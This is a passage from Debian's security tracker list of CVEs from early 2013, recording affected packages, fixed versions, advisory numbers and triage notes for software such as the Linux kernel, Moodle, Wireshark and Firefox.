(SQL injection vulnerability in the Extbase Framework in TYPO3 4.5.x ...) {DSA-2646-1} - typo3-src 4.5.19+dfsg1-5 (bug #702574) CVE-2013-1841 [Reverse lookup issue in Net::Server] RESERVED - libnet-server-perl (low; bug #702914) [wheezy] - libnet-server-perl (Minor issue) [squeeze] - libnet-server-perl (Minor issue) NOTE: https://rt.cpan.org/Ticket/Display.html?id=83909 CVE-2013-1840 (The v1 API in OpenStack Glance Essex (2012.1), Folsom (2012.2), and ...) - glance 2012.1.1-5 (bug #703063) CVE-2013-1839 [DoS (loop, 100% cpu) strHdrAcptLangGetItem() at errorpage.cc] RESERVED - squid3 (the errors were introduced in trunk rev.11496 in 3.2.0.9) NOTE: According to http://seclists.org/bugtraq/2013/Mar/68 not affecting 3.1? NOTE: http://bazaar.launchpad.net/~squid/squid/3.2/revision/11796 CVE-2013-1838 (OpenStack Nova Grizzly, Folsom (2012.2), and Essex (2012.1) does not ...) - nova 2012.1.1-15 (bug #703064) CVE-2013-1837 RESERVED CVE-2013-1836 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...) - moodle (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1835 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...) - moodle (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1834 (notes/edit.php in Moodle 1.9.x through 1.9.19, 2.x through 2.1.10, ...) - moodle (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1833 (Multiple cross-site scripting (XSS) vulnerabilities in the File Picker ...) - moodle (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1832 (repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before ...) - moodle (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1831 (lib/setuplib.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x ...) - moodle (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1830 (user/view.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x ...) - moodle (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1829 (calendar/managesubscriptions.php in Moodle 2.4.x before 2.4.2 does not ...) - moodle (Only in 2.4 to 2.4.1) CVE-2013-1828 (The sctp_getsockopt_assoc_stats function in net/sctp/socket.c in the ...) - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-1827 (net/dccp/ccid.h in the Linux kernel before 3.5.4 allows local users to ...) - linux 3.2.29-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2013-1826 (The xfrm_state_netlink function in net/xfrm/xfrm_user.c in the Linux ...) {DSA-2668-1} - linux 3.2.32-1 (low) - linux-2.6 (low) NOTE: Probably gone since 3.2.32-1, but I checked 3.2.41-2 CVE-2013-1825 REJECTED CVE-2013-1824 RESERVED {DSA-2639-1} - php5 5.4.4-14 NOTE: See CVE-2013-1643 NOTE: http://git.php.net/?p=web/php.git;a=commitdiff;h=e8432b34ee7a196a14a6e0191a00fe73b5a095e7 CVE-2013-1823 (Cross-site scripting (XSS) vulnerability in the Notifications form in ...) NOT-FOR-US: Katello CVE-2013-1822 RESERVED - owncloud (owncloud stable4 (4.0.x) is not affected) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-008/ NOTE: http://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1821 (lib/rexml/text.rb in the REXML parser in Ruby before 1.9.3-p392 allows ...) - ruby1.9.1 1.9.3.194-8.1 (bug #702525) - ruby1.8 1.8.7.358-7 (bug #702526) NOTE: http://www.ruby-lang.org/en/news/2013/02/22/rexml-dos-2013-02-22/ CVE-2013-1820 RESERVED NOT-FOR-US: tuned (RH-specific powersaving tool) CVE-2013-1819 (The _xfs_buf_find function in fs/xfs/xfs_buf.c in the Linux kernel ...) - linux 3.8-1 - linux-2.6 (low) [squeeze] - linux-2.6 (Too risky to backport, minor impact) [wheezy] - linux (Too risky to backport, minor impact) CVE-2013-1818 [mediawiki mwdoc-filter.php information disclosure] RESERVED - mediawiki (mwdoc-filter.php introduced in 1.20) NOTE: register_globals is not supported in Debian anyway, see PHP's README.Debian.security CVE-2013-1817 [mediawiki information disclosure in unblock API] RESERVED - mediawiki 1:1.19.4-1 (bug #702305) CVE-2013-1816 [mediawiki insecure curl usage] RESERVED - mediawiki 1:1.19.4-1 CVE-2013-1815 (PackStack 2012.2.3 in Red Hat OpenStack Essex and Folsom can create ...) NOT-FOR-US: OpenStack PackStack CVE-2013-1814 (The users/get program in the User RPC API in Apache Rave 0.11 through ...) NOT-FOR-US: Apache Rave CVE-2013-1813 [busybox insecure subdir creation under /dev] RESERVED - busybox 1:1.20.0-8 (low; bug #701965) [wheezy] - busybox (Minor issue) [squeeze] - busybox (Minor issue) CVE-2013-1812 RESERVED - ruby-openid 2.1.8debian-6 (bug #702217) - libopenid-ruby (bug #702217) [squeeze] - libopenid-ruby (Minor issue) CVE-2013-1811 [Reporter can change issue status to 'new'] RESERVED - mantis (low; bug #698481) [wheezy] - mantis (Minor issue) [squeeze] - mantis (Minor issue) CVE-2013-1810 [summary.php category/project names XSS vulnerability] RESERVED - mantis (only affects MantisBT 1.2.12) CVE-2013-1809 [Gambas creates hijackable directory in /tmp] RESERVED - gambas3 (low; bug #702184) - gambas2 [wheezy] - gambas3 (Minor issue) [squeeze] - gambas2 (Minor issue) NOTE: https://code.google.com/p/gambas/issues/detail?id=365 CVE-2013-1808 (Cross-site scripting (XSS) vulnerability in ZeroClipboard.swf and ...) - db4o (unimportant) - jenkins (bug #706725) CVE-2013-1807 RESERVED CVE-2013-1806 RESERVED CVE-2013-1805 RESERVED CVE-2013-1804 RESERVED CVE-2013-1803 RESERVED CVE-2013-1802 (The extlib gem 0.9.15 and earlier for Ruby does not properly restrict ...) - ruby-extlib 0.9.15-3 (bug #697895) - libextlib-ruby (bug #697895) CVE-2013-1801 (The httparty gem 0.9.0 and earlier for Ruby does not properly restrict ...) NOT-FOR-US: httparty Ruby gem CVE-2013-1800 (The crack gem 0.3.1 and earlier for Ruby does not properly restrict ...) - ruby-crack (bug #623900) CVE-2013-1799 (Gnome Online Accounts (GOA) 3.6.x before 3.6.3 and 3.7.x before ...) - gnome-online-accounts CVE-2013-1798 (The ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux ...) {DSA-2668-1} - linux 3.2.41-2 - linux-2.6 NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1797 (Use-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel ...) - linux 3.2.41-2 - linux-2.6 NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1796 (The kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux ...) {DSA-2669-1 DSA-2668-1} - linux 3.2.41-2 - linux-2.6 NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1795 (Integer overflow in ptserver in OpenAFS before 1.6.2 allows remote ...) {DSA-2638-1} - openafs 1.6.1-3 CVE-2013-1794 (Buffer overflow in certain client utilities in OpenAFS before 1.6.2 ...) {DSA-2638-1} - openafs 1.6.1-3 CVE-2013-1793 RESERVED CVE-2013-1792 (Race condition in the install_user_keyrings function in ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1791 RESERVED CVE-2013-1790 (poppler/Stream.cc in poppler before 0.22.1 allows context-dependent ...) - poppler 0.18.4-6 (low; bug #702071) CVE-2013-1789 (splash/Splash.cc in poppler before 0.22.1 allows context-dependent ...) - poppler (vulnerable code introduced in a later version) TODO: recheck poppler >= 0.22 when it gets uploaded CVE-2013-1788 (poppler before 0.22.1 allows context-dependent attackers to cause a ...) - poppler 0.18.4-6 (low; bug #702071) CVE-2013-1787 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1786 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1785 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1784 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1783 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in ...) NOT-FOR-US: Drupal addon CVE-2013-1782 (Cross-site scripting (XSS) vulnerability in the Responsive Blog Theme ...) NOT-FOR-US: Drupal addon CVE-2013-1781 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1780 (Cross-site scripting (XSS) vulnerability in the Best Responsive Theme ...) NOT-FOR-US: Drupal addon CVE-2013-1779 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1778 (Cross-site scripting (XSS) vulnerability in the Creative Theme 7.x-1.x ...) NOT-FOR-US: Drupal addon CVE-2013-1777 RESERVED CVE-2013-1776 (sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when the ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-1775 (sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701838) NOTE: severity depends a lot on the environment CVE-2013-1774 (The chase_port function in drivers/usb/serial/io_ti.c in the Linux ...) {DSA-2668-1} - linux 3.2.38-1 - linux-2.6 CVE-2013-1773 (Buffer overflow in the VFAT filesystem implementation in the Linux ...) {DSA-2668-1} - linux 3.2.15-1 - linux-2.6 NOTE: Probably gone since 3.2.15-1, but I checked 3.2.41-2 CVE-2013-1772 (The log_prefix function in kernel/printk.c in the Linux kernel 3.x ...) - linux 3.2.39-1 - linux-2.6 (Vulnerability exposed since 3.0) CVE-2013-1771 [monkey: world-readable logdir] RESERVED - monkey (low) [squeeze] - monkey (Minor issue) NOTE: http://www.openwall.com/lists/oss-security/2013/02/24/5 CVE-2013-1770 [XSS issues in views_view.php] RESERVED - ganglia (low; bug #700158) [squeeze] - ganglia (Minor issue) [wheezy] - ganglia (Minor issue) - ganglia-web (bug #700159) NOTE: ganglia-web only in experimental, security-tracker does not handle experimental versions NOTE: Upstream non-verified fix https://github.com/ganglia/ganglia-web/commit/552965f33bf79d41ccbec3f1f26840c8bab54ad6 CVE-2013-1769 [Crashes when trying to hash caps containing pathological data forms] RESERVED - telepathy-gabble 0.16.5-1 (bug #702252) CVE-2013-1768 RESERVED CVE-2013-1767 (Use-after-free vulnerability in the shmem_remount_fs function in ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1766 (libvirt 1.0.2 and earlier sets the group owner to kvm for device ...) {DSA-2650-1} - libvirt 0.9.12-8 (bug #701649) CVE-2013-1765 RESERVED CVE-2013-1764 RESERVED - packagekit (Zypp backend specific to SuSE) CVE-2013-1763 (Array index error in the __sock_diag_rcv_msg function in ...) - linux (Introduced in 3.3) NOTE: 3.6.9 and 3.7.8 in experimental are affected, 3.8 will be fixed. CVE-2013-1762 (stunnel 4.21 through 4.54, when CONNECT protocol negotiation and NTLM ...) {DSA-2664-1} - stunnel4 3:4.53-1.1 (bug #702267) CVE-2013-1761 RESERVED CVE-2013-1760 RESERVED CVE-2013-1759 RESERVED CVE-2013-1758 RESERVED CVE-2013-1757 RESERVED CVE-2013-1756 RESERVED CVE-2013-1755 RESERVED CVE-2013-1754 RESERVED CVE-2013-1753 RESERVED CVE-2013-1752 RESERVED CVE-2013-1751 RESERVED - twiki NOTE: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2013-1751 CVE-2013-1750 (Heap-based buffer overflow in RealNetworks RealPlayer before 16.0.1.18 ...) NOT-FOR-US: RealPlayer CVE-2013-1749 (Cross-site scripting (XSS) vulnerability in edit.php in PHP Address ...) NOT-FOR-US: PHP Address Book CVE-2013-1748 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...) NOT-FOR-US: PHP Address Book CVE-2012-6533 (Buffer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and ...) NOT-FOR-US: Symantec PGP Desktop CVE-2013-1747 (channel.c in ngIRCd 20 and 20.1 allows remote attackers to cause a ...) - ngircd (Vulnerable version was only in experimental, introduced in 20.1-1~exp1 and fixed in 20.2-1~exp1) CVE-2013-1746 RESERVED CVE-2013-1745 RESERVED CVE-2013-1744 RESERVED CVE-2013-1743 RESERVED CVE-2013-1742 RESERVED CVE-2013-1741 RESERVED CVE-2013-1740 RESERVED CVE-2013-1739 RESERVED CVE-2013-1738 RESERVED CVE-2013-1737 RESERVED CVE-2013-1736 RESERVED CVE-2013-1735 RESERVED CVE-2013-1734 RESERVED CVE-2013-1733 RESERVED CVE-2013-1732 RESERVED CVE-2013-1731 RESERVED CVE-2013-1730 RESERVED CVE-2013-1729 RESERVED CVE-2013-1728 RESERVED CVE-2013-1727 RESERVED CVE-2013-1726 RESERVED CVE-2013-1725 RESERVED CVE-2013-1724 RESERVED CVE-2013-1723 RESERVED CVE-2013-1722 RESERVED CVE-2013-1721 RESERVED CVE-2013-1720 RESERVED CVE-2013-1719 RESERVED CVE-2013-1718 RESERVED CVE-2013-1717 RESERVED CVE-2013-1716 RESERVED CVE-2013-1715 RESERVED CVE-2013-1714 RESERVED CVE-2013-1713 RESERVED CVE-2013-1712 RESERVED CVE-2013-1711 RESERVED CVE-2013-1710 RESERVED CVE-2013-1709 RESERVED CVE-2013-1708 RESERVED CVE-2013-1707 RESERVED CVE-2013-1706 RESERVED CVE-2013-1705 RESERVED CVE-2013-1704 RESERVED CVE-2013-1703 RESERVED CVE-2013-1702 RESERVED CVE-2013-1701 RESERVED CVE-2013-1700 RESERVED CVE-2013-1699 RESERVED CVE-2013-1698 RESERVED CVE-2013-1697 RESERVED CVE-2013-1696 RESERVED CVE-2013-1695 RESERVED CVE-2013-1694 RESERVED CVE-2013-1693 RESERVED CVE-2013-1692 RESERVED CVE-2013-1691 RESERVED CVE-2013-1690 RESERVED CVE-2013-1689 RESERVED CVE-2013-1688 RESERVED CVE-2013-1687 RESERVED CVE-2013-1686 RESERVED CVE-2013-1685 RESERVED CVE-2013-1684 RESERVED CVE-2013-1683 RESERVED CVE-2013-1682 RESERVED CVE-2013-1681 (Use-after-free vulnerability in the ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1680 (Use-after-free vulnerability in the nsFrameList::FirstChild function ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1679 (Use-after-free vulnerability in the ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1678 (The _cairo_xlib_surface_add_glyph function in Mozilla Firefox before ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1677 (The gfxSkipCharsIterator::SetOffsets function in Mozilla Firefox ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1676 (The SelectionIterator::GetNextSegment function in Mozilla Firefox ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1675 (Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1674 (Use-after-free vulnerability in Mozilla Firefox before 21.0, Firefox ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1673 (The Mozilla Updater in Mozilla Firefox before 21.0 on Windows does not ...) - iceweasel (Windows build only) CVE-2013-1672 (The Mozilla Maintenance Service in Mozilla Firefox before 21.0, ...) - iceweasel (Windows build only) - icedove (Windows build only) - iceape (Windows build only) CVE-2013-1671 (Mozilla Firefox before 21.0 does not properly implement the INPUT ...) - iceweasel [wheezy] - iceweasel (Doesn't affect ESR 17 series) NOTE: fixed in experimental in 21.0-1 CVE-2013-1670 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-1669 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 17.0.6esr-1 [wheezy] - iceweasel (Only affects Firefox 20) - icedove [wheezy] - icedove (Only affects Firefox 20) - iceape [wheezy] - iceape (Only affects Firefox 20) NOTE: fixed in experimental in 21.0-1 CVE-2013-1668 RESERVED CVE-2013-1667 (The rehash mechanism in Perl 5.8.2 through 5.16.x allows ...) {DSA-2641-1} - perl 5.14.2-19 (bug #702296) NOTE: http://www.nntp.perl.org/group/perl.perl5.porters/2013/03/msg199755.html CVE-2013-1666 RESERVED - foswiki (bug #509864) CVE-2013-1665 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...) {DSA-2634-1} - keystone 2012.1.1-13 (bug #700948) - python-django 1.4.4-1 CVE-2013-1664 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...) - keystone 2012.1.1-13 (bug #700948) - nova 2012.1.1-13 (bug #700949) - cinder 2012.2.3-1 (bug #700950) CVE-2012-6532 ((1) Zend_Dom, (2) Zend_Feed, (3) Zend_Soap, and (4) Zend_XmlRpc in ...) - zendframework 1.11.13-1 CVE-2012-6531 ((1) Zend_Dom, (2) Zend_Feed, and (3) Zend_Soap in Zend Framework 1.x ...) - zendframework 1.11.13-1 CVE-2013-1663 RESERVED CVE-2013-1662 RESERVED CVE-2013-1661 RESERVED CVE-2013-1660 RESERVED CVE-2013-1659 (VMware vCenter Server 4.0 before Update 4b, 5.0 before Update 2, and ...) NOT-FOR-US: vCenter CVE-2013-1658 RESERVED CVE-2013-1657 RESERVED CVE-2011-5265 (Cross-site scripting (XSS) vulnerability in cached_image.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2011-5264 (Cross-site scripting (XSS) vulnerability in lazyest-backup.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2011-5263 (Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in ...) NOT-FOR-US: SAP NetWeaver CVE-2011-5262 (SQL injection vulnerability in prodpage.cfm in SonicWALL Aventail ...) NOT-FOR-US: SonicWALL Aventail CVE-2011-5261 (Cross-site scripting (XSS) vulnerability in serverreport.cgi in Axis ...) NOT-FOR-US: Axis M10 Series Network Cameras CVE-2011-5260 (Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP ...) NOT-FOR-US: NetWeaver CVE-2011-5259 (SQL injection vulnerability in lib/controllers/CentralController.php ...) NOT-FOR-US: OrangehRM CVE-2011-5258 (Multiple cross-site scripting (XSS) vulnerabilities in OrangeHRM ...) NOT-FOR-US: OrangehRM CVE-2011-5257 (Multiple cross-site scripting (XSS) vulnerabilities in the Classipress ...) NOT-FOR-US: WordPress theme CVE-2011-5256 (Cross-site scripting (XSS) vulnerability in the tooltips in LimeSurvey ...) - limesurvey (bug #472802) CVE-2013-1656 (Spree Commerce 1.0.x through 1.3.2 allow remote authenticated ...) NOT-FOR-US: Spree CVE-2013-1655 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1654 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, and Puppet ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1653 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1652 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1651 RESERVED CVE-2013-1650 RESERVED CVE-2013-1649 RESERVED CVE-2013-1648 RESERVED CVE-2013-1647 RESERVED CVE-2013-1646 RESERVED NOT-FOR-US: Open-Xchange CVE-2013-1645 RESERVED CVE-2013-1644 RESERVED CVE-2013-1643 (The SOAP parser in PHP before 5.3.22 and 5.4.x before 5.4.13 allows ...) {DSA-2639-1} - php5 5.4.4-14 (bug #702221) NOTE: http://git.php.net/?p=php-src.git;a=commitdiff;h=c737b89473df9dba6742b8fc8fbf6d009bf05c36 CVE-2013-1642 RESERVED CVE-2013-1641 RESERVED CVE-2013-1640 (The (1) template and (2) inline_template functions in the master ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1639 (Opera before 12.13 does not send CORS preflight requests in all ...) NOT-FOR-US: Opera CVE-2013-1638 (Opera before 12.13 allows remote attackers to execute arbitrary code ...) NOT-FOR-US: Opera CVE-2013-1637 (Opera before 12.13 allows remote attackers to execute arbitrary code ...) NOT-FOR-US: Opera CVE-2013-1636 RESERVED CVE-2013-1635 (ext/soap/soap.c in PHP before 5.3.22 and 5.4.x before 5.4.13 does not ...) {DSA-2639-1} - php5 5.4.4-14 (unimportant; bug #702221) NOTE: open_basedir not supported NOTE: http://git.php.net/?p=php-src.git;a=commitdiff;h=702b436ef470cc02f8e2cc21f2fadeee42103c74 CVE-2013-1634 RESERVED CVE-2013-1633 RESERVED CVE-2013-1632 RESERVED CVE-2013-1631 RESERVED CVE-2013-1630 RESERVED CVE-2013-1629 RESERVED CVE-2013-1628 RESERVED CVE-2013-1627 (Absolute path traversal vulnerability in NTWebServer.exe in Indusoft ...) NOT-FOR-US: Indusoft Studio, Advantech Studio CVE-2013-1626 RESERVED CVE-2013-1625 RESERVED CVE-2013-1624 (The TLS implementation in the Bouncy Castle Java library before 1.48 ...) - bouncycastle 1.48+dfsg-2 (low; bug #699885) [squeeze] - bouncycastle (Minor issue) [wheezy] - bouncycastle (Minor issue) CVE-2013-1623 (The TLS and DTLS implementations in wolfSSL CyaSSL before 2.5.0 do not ...) - mysql-5.1 - mysql-5.5 5.5.30+dfsg-1.1 (bug #699886) - cyassl (bug #598391) - libyassl (bug #664533) CVE-2013-1622 REJECTED CVE-2013-1621 (Array index error in the SSL module in PolarSSL before 1.2.5 might ...) {DSA-2622-1} - polarssl 1.1.4-2 (bug #699887) CVE-2013-1620 (The TLS implementation in Mozilla Network Security Services (NSS) does ...) - nss 2:3.14.3-1 (bug #699888) CVE-2013-1619 (The TLS implementation in GnuTLS before 2.12.23, 3.0.x before 3.0.28, ...) - gnutls26 2.12.20-4 - gnutls28 3.0.22-3 CVE-2013-1618 (The TLS implementation in Opera before 12.13 does not properly ...) NOT-FOR-US: Opera CVE-2013-1617 RESERVED CVE-2013-1616 RESERVED CVE-2013-1615 RESERVED CVE-2013-1614 RESERVED CVE-2013-1613 RESERVED CVE-2013-1612 RESERVED CVE-2013-1611 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Symantec Brightmail Gateway CVE-2013-1610 RESERVED CVE-2013-1609 (Multiple unquoted Windows search path vulnerabilities in the (1) File ...) NOT-FOR-US: Symantec CVE-2013-1608 (Directory traversal vulnerability in the Management Console on the ...) NOT-FOR-US: Symantec CVE-2013-1607 RESERVED CVE-2013-1606 RESERVED CVE-2013-1605 RESERVED CVE-2013-1604 RESERVED CVE-2013-1603 RESERVED CVE-2013-1602 RESERVED CVE-2013-1601 RESERVED CVE-2013-1600 RESERVED CVE-2013-1599 RESERVED CVE-2013-1598 RESERVED CVE-2013-1597 RESERVED CVE-2013-1596 RESERVED CVE-2013-1595 RESERVED CVE-2013-1594 RESERVED CVE-2013-1593 RESERVED CVE-2013-1592 RESERVED CVE-2013-1591 (Stack-based buffer overflow in libpixman, as used in Pale Moon before ...) - pixman 0.26.0-4 (bug #700308) [squeeze] - pixman (Vulnerable code not present) CVE-2013-1590 (Buffer overflow in the NTLMSSP dissector in Wireshark 1.6.x before ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 CVE-2013-1589 (Double free vulnerability in epan/proto.c in the dissection engine in ...) - wireshark 1.8.6-1 (unimportant) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Not suitable for code injection CVE-2013-1588 (Multiple buffer overflows in the dissect_pft_fec_detailed function in ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8213 NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47098 CVE-2013-1587 (The dissect_rohc_ir_packet function in epan/dissectors/packet-rohc.c ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7679 NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=44700 CVE-2013-1586 (The fragment_set_tot_len function in epan/reassemble.c in Wireshark ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8111 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46999 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47000 CVE-2013-1585 (epan/tvbuff.c in Wireshark 1.6.x before 1.6.13 and 1.8.x before 1.8.5 ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8112 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46705 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46678 CVE-2013-1584 (The dissect_version_5_and_6_primary_header function in ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46579 CVE-2013-1583 (The dissect_version_4_primary_header function in ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46577 CVE-2013-1582 (The dissect_clnp function in epan/dissectors/packet-clnp.c in the CLNP ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7871 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=45646 CVE-2013-1571 RESERVED CVE-2013-1570 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-1569 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1568 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1567 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-1566 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-1565 (Unspecified vulnerability in the Oracle GoldenGate Veridata component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1564 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1563 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK) - openjdk-7 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK) CVE-2013-1562 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services CVE-2013-1561 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1560 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services CVE-2013-1559 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1558 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1557 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1556 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1555 (Unspecified vulnerability in MySQL 5.1.67 and earlier and 5.5.29 and ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 CVE-2013-1554 (Unspecified vulnerability in the Network Layer component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-1553 (Unspecified vulnerability in the Oracle Web Services Manager component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1552 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 CVE-2013-1551 (Unspecified vulnerability in the Siebel Enterprise Application ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-1550 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft 